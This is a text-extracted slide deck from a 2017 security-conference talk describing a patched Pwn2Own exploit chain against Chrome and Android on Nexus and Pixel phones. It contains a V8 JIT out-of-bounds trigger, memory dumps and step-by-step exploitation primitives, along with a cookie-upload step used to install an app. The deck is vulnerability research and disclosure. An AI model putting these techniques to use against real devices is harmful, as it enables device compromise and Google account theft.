Upload
cansecwest
View
1.758
Download
8
Embed Size (px)
Citation preview
Pwning theNexus ™ ofEveryPixel ™
Qidan HeGengming Liu
CanSecWest 2017Vancouver
#whoami
• Qidan He• Apple/Android/ChromeCVEhunter(dozensofcreditsgot)• SpeakeratBlackHat USA/ASIA,DEFCON,RECON,CanSecWest,HITCON• Pwn2Own2016/MobilePwn2Own2016winner
• Gengming Liu• CTFenthusiastic,DEFCONCTFfinalplayer• CaptainofAAACTFteam• MobilePwn2Own2016winner• ToobusyoccupiedinPwn2OwntotalkL
AboutTencent KeenSecurityLab
• Previously known as KeenTeam•Won iOS 7 category in MobilePwn2Own 2013•Won Nexus 6p/iOS 10.1 and got“Master of Pwn” in MobilePwn2Own 2016
TL;DR:HowwepwnednewestNexus6P/PixelrunningNougat• Threebugsformsacompleteexploitchain• OneV8bugtocompromisetherenderer• OneIPCbugtoescapesandbox• Onebugingappsallowsappinstall
• Googleresponseveryquickly• V8andIPCbugfixedinmidnightof10.26(CVE-2016-5197andCVE-2016-5198)• Gappupdatepushedin10.27(GoogleVRPcredit)
• Alsoaffectsallappsusingwebview/chromium
Agenda• IntroductionandExploitationofV8engine• IntroductionandExploitationofsandboxonAndroid•HowwepwnedNexus/PixelonMobilePwn2Own2016with3bugs• CVE-2016-5197/5198/GoogleVRP bug
HistoryofclassicalChromeexploits
• MWRLabs,Pwn2Own2013• Type-confusioninwebkit• ArbitraryzerowriteinIPC::OnContentBlocked
• PinkiePie,MobilePwn2Own2013• Runtime_TypedArrayInitializeFromArrayLike forrenderercodeexecution• ArbitraryfreeinClipboardHostMsg_WriteObjectsAsync
• Geohot inPwnium 4• PropertyredefinitionleadtoOOBread/writeinrenderer• SpoofIPCMessagetovulnerableextensioninprivilegeddomain
• Lokihart inPwn2Own2015• TOCTOUinGPUprocesssharedmemory
• Juri InPwn2Own2015• UAFinP2PSocketDispatcherHost
V8Javascript Engine
• Widelyknownandused• RuntimeoptimizationandJITtomachinecode• Strongtalk• Crankshaft• Turbofan
ObjectstructureinV8
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
gdb-peda$x/30xg0x00002036cb90a0880x2036cb90a088:0x00000ebbd6702db10x00001b64157822410x2036cb90a098:0x00001b64157822410x00006161000000000x2036cb90a0a8:0x00005652757bea600x0000000000000004
BoxinginV8
• Float&Double encapsulatedinV8heap• HeapNumber object• vmovsd QWORDPTR[rax+0x7],xmm0
• SMI• Taggedpointer
Casestudy:CVE-2016-1646
• V8Array.concat redefinitionout-of-boundsinPwn2Own2016• ReportedbyWenXufromKeenLab
Casestudy:CVE-2016-1646
CVE-2016-5197– ChainofBugs#1
• FoundbyKeenLab andusedforMobilePwn2Own2016• AffectsallenginesbasedonV8andapplicationswithWebview
Howweexploited CVE-2016-5198
CVE-2016-5198ByKeenLab
CVE-2016-5197
HowyourJITsucks
• JITcompileswithtype-infoinmind• Accesscodegeneratedaccordingly• Whatifobjecttypechanged?• Deoptimize andregenerate
• But… therewillbemistakes• WhatifJITed accessonglobals?
function Ctor() {n = new Set();}function Check() {n.xyz = 0x826852f4;parseInt('AAAAAAAA');}for(var i=0; i<2000; ++i) {Ctor();}for(var i=0; i<2000; ++i) {Check();}Ctor();Check();print("finish");
var n;function Ctor() {n=new Set();}function Check() {n.xyz =0x826852f4;}Ctor();Ctor();%OptimizeFunctionOnNextCall(Ctor);Ctor();Check();Check();%OptimizeFunctionOnNextCall(Check);Check();Ctor();Check();parseInt('AAAAAAAA')
OOBinOptimizedJITcode
OOBinOptimizedJITcode
OptimizedcodeforCtor
Non-optimizedcodeforfunc`Check`
Optimized
Optimized
0x3f9385872433548b8c1bf4a339d070000REX.Wmovq rax,0x79d334abfc1;;object:0x79d334abfc1PropertyCell for0x130199d54631<aSetwithmap0x1ffdd430c391>
0x3f93858724d45488b400fREX.Wmovq rax,[rax+0xf]
Optimized
0x3f9385872514949ba0000805e0a4de041REX.Wmovq r10,0x41e04d0a5e8000000x3f93858725b59c4c1f96ec2vmovq xmm0,r100x3f93858726064488b4007REX.Wmovq rax,[rax+0x7]0x3f93858726468488b400fREX.Wmovq rax,[rax+0xf]0x3f93858726872c5fb114007vmovsd [rax+0x7],xmm0
Heapnumberoverwrite
Normally…
• Optimizedcodeassumestheobjectalreadyhaveproperty
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x41414141
mov rax,QWORD PTR [rax+0xf]
Map length:1
Non-empty FixedArray
Property1 …
Javascript: n.xyz = 0x41414141
However…
• Whatiftheobjectischangedanditdoesn’thavepropertynow?
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map Hashcode
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x41414141
mov rax,QWORD PTR [rax+0xf]
OUT OF BOUNDS HERE!
Map length:1
Non-empty FixedArray
Property1 Property
Out-of-boundtonullstring
• Overwritingfieldsofnullstring• Withheapnumber overwritewecandoanindirectwrite
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map length:1
Non-empty FixedArray
Property1
Map Hashcode
Null string
length Chars0x4141414141..
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x826852f4
mov rax,QWORD PTR [rax+0xf]
OUT OF BOUNDS HERE!
Map …type
Map for ONE_BYTE_INTERNALIZED_STRING_TYPE
…
vmovsd QWORD PTR [rax+0x7],xmm0
0x41e04d0a5e800000
Confused to EXTERNAL_STRING
Chars interpreted as Pointer
Property
ExploitationSteps
• OOBwritecharsfieldofnullstringtoleakArrayBufferaddress• OverwriteArrayBufferbacking_store toleakFunctioncodeaddress• OverwriteArrayBufferbacking_store withFunctioncodeaddress• WriteshellcodetoArrayBufferandexec!
Primitives
• Writeprimitive:• HeapNumber write• *(p+8)=v
• Readprimitive• ArrayBuffer lengthisourfriend• Butfirst… leakanArrayBuffer address
• Use#nullstringtocoldstart!
StructureofONE_BYTE_INTERNALIZED_STRINGpwndbg>job0x28b4ff7ab259#fuckpwndbg>x/40xg0x28b4ff7ab2580x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6b637566
#nullstringascoldstart– Run#1
• OOBwritenullstringlength• OOBwritecharsfield• m.d =ab(newArrayBuffer)• newString(null)
• charCodeAt foreachbyte• ArrayBuffer and#nullstringaddressleaked!
• Gotsomethingtowriteat…• Butstill,howtoturnsequentialwriteintoarbitraryaddresswrite?
#nullstringascoldstart– Run#2
• Writeaddressof#nullitselftoitsfield!• m.d =null_str
• PerformHeapNumber overwriteinnextoptimizationrun• m.d =unpackIEEE754(ab_len_ptr)
PlaywithFunction– Run#3
• AllocateFunctionatbegining• ab_storage_ptr =ab_len_ptr +8• m.b =unpackIEEE754(addr_of_code - 8)
• HeapNumber overwrite*ab_storage_ptr =code_loc – 8• Code_ptr =ab[3]<<32+ab[2]
PlaywithFunction- Run##
• m.b =unpackIEEE754(code_ptr)• *ab_storage_ptr =code_ptr• Writeshellcodewithabaccess• CallFunction• Gameover!J
Sorenderercodeexecutiongot…
• Nowwhat?
Theanatomy ofChromesandbox
• AlluntrustedcoderunsinTargetprocess• RelaymostoperationstoBroker• Trybestto• lockdownthecapabilitiesofrenderer
• Evenrendereriscompromised• Accessisstillstrictlyprohibited
• GPUprocesshavehigherlevelaccess• Thannormalsandboxprocess
Thenewcomer:GPUprocess
EvolutionoftheAndroidSandbox(oldtime)
EvolutionoftheAndroidSandbox(currentstate)
Untrusted_app
ProcessprivilegesinAndroid
Isolated_app
media
radio
System_server
KernelAdb shell
State-of-artdefenseofAndroidsandbox
• DACintroducedbynatureofLinux• IsolatedProcess introducedinJellyBean• SELinux enforcedinKitKat• Furtherrestrictedinsubsequentrelease
ChromiumAndroidSandbox(cont.)
• OnAndroid,ChromiumleveragestheisolatedProcess featuretoimplementitssandbox.
ChromiumAndroidSandbox(cont.)
• IsolatedprocesswasintroducedaroundAndroid4.1• "Ifsettotrue,thisservicewillrununderaspecialprocessthatisisolatedfromtherestofthesystemandhasnopermissionsofitsown.”• Chromiumrenderprocess
ChromiumAndroidSandbox(cont.)
• Inherits• App.te• Domain.te• Domain_deprecated.te
ChromiumAndroidSandbox(cont.)
• Neverallow triggerscompile-timeerrorsifdisobeyed
Per interface constraint• Activity,display,webview_update canbeaccessed,but• Only interfaces without enforceNotIsolatedCaller can be invoked
Possiblewaysforescapingthechromesandbox
•ExploitingChromeIPC(!theold-fashionedway)•ExploitingbasicBinderclasses• Libutils/libcutils• Serialization
•ExploitingKernel
Possiblewaysforescapingthechromesandbox
•ExploitingChromeIPC(!theold-fashionedway)•ExploitingbasicBinderclasses• Libutils/libcutils• Serialization
•ExploitingKernel
Exploitingbinderobjecttransaction/lib*utils
• CVE-2014-7911• Lackofserializable validationinObjectInputStream• Supplynativefieldsviade-serialization
• CVE-2015-1528• LackoftransientfieldinX509Certificateclassdefinition
• CVE-2015-3875• SharedBuffer integeroverflow• VectorImpl::setCapacity
• Complexobjectsinbundleareautomaticallyunboxedwhentouched
So… HowdoweescapethesandboxinMobilePwn2Own2016?ChainofBugs#2
void RenderViewImpl::LaunchAndroidContentIntent(const GURL&intent,size_t request_id,bool is_main_frame){if (request_id !=expected_content_intent_id_)return;
//Removethecontenthighlightingifany.ScheduleComposite();
if (!intent.is_empty()){base::RecordAction(base::UserMetricsAction("Android.ContentDetectorActivated"));Send(newViewHostMsg_StartContentIntent(GetRoutingID(),intent,is_main_frame));}}//src/content/renderer/renderer_view_impl.cc
bool RenderWidgetHostViewAndroid::OnMessageReceived(const IPC::Message&message){if (IPC_MESSAGE_ID_CLASS(message.type())==SyncCompositorMsgStart){return SyncCompositorOnMessageReceived(message);}bool handled=true;IPC_BEGIN_MESSAGE_MAP(RenderWidgetHostViewAndroid,message)IPC_MESSAGE_HANDLER(ViewHostMsg_StartContentIntent,OnStartContentIntent)IPC_MESSAGE_HANDLER(ViewHostMsg_SmartClipDataExtracted,OnSmartClipDataExtracted)IPC_MESSAGE_HANDLER(ViewHostMsg_ShowUnhandledTapUIIfNeeded,OnShowUnhandledTapUIIfNeeded)IPC_MESSAGE_UNHANDLED(handled=false)IPC_END_MESSAGE_MAP()return handled;}
void RenderWidgetHostViewAndroid::OnStartContentIntent(const GURL&content_url,boolis_main_frame){if (content_view_core_)content_view_core_->StartContentIntent(content_url,is_main_frame);}
//...
src/content/browser/android/content_view_core_impl.cc //inrendererprocesscontext
void ContentViewCoreImpl::StartContentIntent(const GURL&content_url,boolis_main_frame){JNIEnv*env =AttachCurrentThread();ScopedJavaLocalRef<jobject>j_obj =java_ref_.get(env);if (j_obj.is_null())return;ScopedJavaLocalRef<jstring>jcontent_url =ConvertUTF8ToJavaString(env,content_url.spec());Java_ContentViewCore_startContentIntent(env,j_obj,jcontent_url,is_main_frame);}
CVE-2016-5197Arbitraryintentstartinrenderer
Webviewinappisnotisolated
• Webview stillrunsinthesameuid/processasordinaryapp• Withthearbitraryactivitystartability• Findsomeappwhichacceptscontrolled-URLtoattack!
MobilePwn2OwnChainofBugs#3
• SeethatholyGoogleDrive• HavefullaccesstoGoogleaccount• TrustedbyGooglePlay• To“install”app
• Blindlyopensanyintent-controlledURL• Pwn ittojumpfromisolatedtountrusted• PlusAppinstallationability!
• Installarbitrarycustomapp• GotAllpermissions• GoogleVRPcredit
Chainitalltogether
• UseCVE-2016-5198togaincontrolofrendererinChromebrowser• Note:chromecurrentlyis32bit
• SearchforIPCobjects,issueViewHostMsg_StartContentIntentrequest• JumptoGoogleDrive,openEXPpageagain• Note:GoogleDriveisa64bitappsoitswebview isalso64bit
• Gotashellinuntrusted_app contextfromGoogleDrive• Reloadplay.google.com,uploadcookies.db inappdatadirectory• Sendinstallapprequest,waitforBOOM
DEMO
Acknowledgements
• GengmingLiu• LiangChen• Wushi
Questions?
KeyfeaturesofV8
• Fastpropertyaccess• Dynamicmachinecodegeneration